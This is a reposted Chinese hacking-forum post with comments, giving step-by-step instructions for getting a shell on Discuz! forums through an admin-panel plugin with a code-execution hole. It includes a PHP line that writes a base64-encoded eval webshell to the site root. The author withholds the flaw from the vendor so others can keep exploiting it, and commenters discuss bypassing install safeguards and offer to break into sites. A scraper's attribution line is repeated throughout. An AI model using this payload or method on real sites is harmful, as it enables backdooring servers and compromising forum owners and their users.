记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Discuz! 多个版本 后台拿shell,需有安装APP权限

2013-07-22 19:51

具体哪些版本存在漏洞,自己测试,只要能安装这个插件的,就能拿到shell,这个已经在手里 很久了,但是使用其拿shell,也没几次,没事写出来,大家乐乐,别忘记感谢。

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

这个方法,就是需要 zend 支持【插件zend加密】,当然我还有一个不需要ZEND支持的,都是 app第三方的插件问题。

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

下面我来说说过程吧!

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

1.安装 zend 权限检查插件,因为后面利用到的插件是zend加密的,只要装了这个插件,后面的插件才能正常安装!

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

http://addon.discuz.com/?@study_zendcheck.pack

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

2.安装雨哲关于我们单页插件。 【[i][/i]ps:雨哲的好几个插件都有这个代码执行漏洞,自己发掘~!】

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

插件 - 雨哲关于我们单页 v5.6

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

3.页面管理,随便编辑一个页面,注意到了吧,没错,任意代码执行,下面我们就让生成一个小马

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

我插入:

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

fputs(fopen('88.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));

然后我提交!

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

页面管理 - 插件 - 雨哲关于我们单页 v5.6

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

4.保存好后,我们点预览刚才编辑的页面,如图:

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

预览刚才编辑的页面

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

5.来看看我们的成果,会在根目录下面生成:88.php 密码为:c

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

无图无真相,翠花上图:

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

在根目录下面生成:88.php

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

本来想先通知厂家的,厂家一下下架了,大家就没得玩了,所以就放在技术社区里面,大家觉得能用上,也点 感谢 下。

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

还有一个不需要 zend权限的插件,能直接上传任何后缀名的文件,看感谢情况而定,是否发出。

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

还有 Discuz!NT 高版本 rss.aspx 不能编辑的情况下,进入后台后 拿shell 的办法。这次就不说了!

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

[原文地址]

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

相关讨论:

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

11#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

木易耳朵 | 2013-07-21 00:23

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

安装插件需要有安全码啊。不通用。即使你的账户是创始人,没有安全码你也不能安装插件。

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

12#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

江南的鱼 | 2013-07-21 00:36

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

自己有没测试,安全码是在论坛端还是在插件端设置的?为毛我试了好多都没要安全码?我本地下载安装也没有安全码,如果是在dz官方插件注册用户绑定了域名,这个域名对应一个帐号,而没绑定域名的可以不要安全码安装,我想改下host文件就绕过了,当然要看这个安全码是哪个了,请说明安全码是哪来的,怎么设置的,才能想到绕过的办法

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

14#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

木易耳朵 | 2013-07-21 08:45

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

@江南的鱼 我日的一个企业大客户版,就是官方报价几十万的那种。安装插件是要确认安全码的。这个安全码可以重设,但是要在网站目录上传一个txt验证文件后才可以重新设置。

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

16#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

苦战 | 2013-07-21 10:05

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

不通用 安全码是硬伤 不解释

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

17#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

debug | 2013-07-21 10:47

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

哈哈 还有几个插件也是。。。 拿着很久了

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

18#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

江南的鱼 | 2013-07-21 11:01

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

@木易耳朵 如果需要,可以联系我帮你拿shell

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

20#

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

Yaseng (看黄片 到 www.yaseng.me) | 2013-07-21 13:51

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

我会说 可以自己提交带后门的插件玩玩

本文转自:Discuz! 多个版本 后台拿shell,需有安装APP权限,文章作者:江南的鱼,原文地址:http://www.hackdig.com/?07/hack-4921.htm,转载请注明作者及出处!采集狗!

知识来源: lcx.cc/?i=3750

阅读:92392 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“Discuz! 多个版本 后台拿shell,需有安装APP权限”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云